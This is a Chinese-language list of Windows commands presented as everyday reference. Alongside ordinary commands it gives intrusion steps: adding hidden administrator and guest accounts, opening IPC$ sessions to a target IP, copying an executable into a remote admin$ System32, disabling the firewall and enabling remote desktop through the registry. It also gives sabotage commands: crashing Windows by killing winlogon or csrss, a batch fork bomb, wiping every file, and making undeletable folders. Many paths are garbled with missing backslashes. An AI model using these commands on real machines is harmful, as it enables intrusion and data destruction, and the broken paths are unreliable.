windows常用命令
net user 用户名 密码 /add (建立用户)
net localgroup administrators 用户名 /add (将用户加到管理员,使其拥有管理权限)
net user guest /active:Yes (激活guest用户)
net user guest 12345 (修改guest密码为12345)
net user (查看账号属性)
net use \ipipc$ "" /user (建立空IPC链接)
net use \ipipc$ "密码" /user:"用户名" (建立IPC非空链接,非空链接就是需要帐户和密码)
net use \ipipc$ /del (删除IPC空链接)
net start (查看开启了哪些服务)
net start 服务名 (开启服务)
net time \目标IP (查看对方时间)
net view (查看本地局域网开启了哪些共享)
net share (查看本地开启的哪些共享)
net share C$/del (删除C:共享)
netstat -a (查看计算机开放了哪些端口)
netstat -n (查看端口的网络连接情况)
nbtstat -A ip (对方136到139一个端口开放了就可以查出对方用户名)
Copy xx.exe\ipadmin$System32 (将当前xx.exe复制到对方Admin$共享的System32目录内)
sc config tlntsvr start= auto(修改telnet服务的启动方式为自动,auto前面有一个空格)
net stop sharedaccess(关闭系统自带的防火墙)
net send IP 消息(利用messenger服务向目标IP发送消息)
ntsd -c q -pn winlogon.exe(蓝屏重启)
ntsd -c q -pn csrss.exe(死机)
tasklist(查看进程)
taskkill(结束进程)
开启禁用的telnet服务:
sc config tlntsvr start= auto(auto前有空格)
开启3389远程终端
reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f
开启C盘默认共享
net share c$=c:
开启计划任务服务(at命令需要这一服务)
net start schedule
开启远程注册表(Remote Registry)服务
net start remoteregistry
1.重复执行某条命令直至死机的批处理代码:
start cmd
%0
2.复制一个文件的磁盘的每个子文件夹当中:
for /r /d %a in (*) do copy test.txt "%a" /y
3.不停地执行同一条命令:
for /l %a in (1,0,2) do net send 192.168.2.25 “Hi!"
4.死机,蓝屏
ntsd -c q -pn winlogon.exe
ntsd -c q -pn csrss.exe
5.自删除,批处理文件名为delme.bat
……
del delme.bat
6.删除磁盘所有文件:
del * /a /s /q /f
7.创建名字为空的文件夹:
md (按住Alt键,在小键盘上按2,5,5,然后松开Alt,回车)
8.创建无法删除的特殊名字文件夹:
md \.c:con
md \.c:aux
9.创建无法双击打开无法删除的另类文件夹:
md test..
rd test.. /s /q
Cd 切换目录
Dir 列出所有文件信息
Del 删除文件
Md 创建目录 Rd删除目录
Copy 复制
Xcopy 复制文件和文件夹
Cls 清屏
Attrib 修改文件、文件夹属性
Date、Time显示日期、时间
Path 系统路径
Set 显示、设置系统信息
Ren(Rename)重命名
Subst 虚拟磁盘
Ver 显示操作系统版本
Help 帮助
Systeminfo 查看系统软硬件信息
/? 显示某条命令的帮助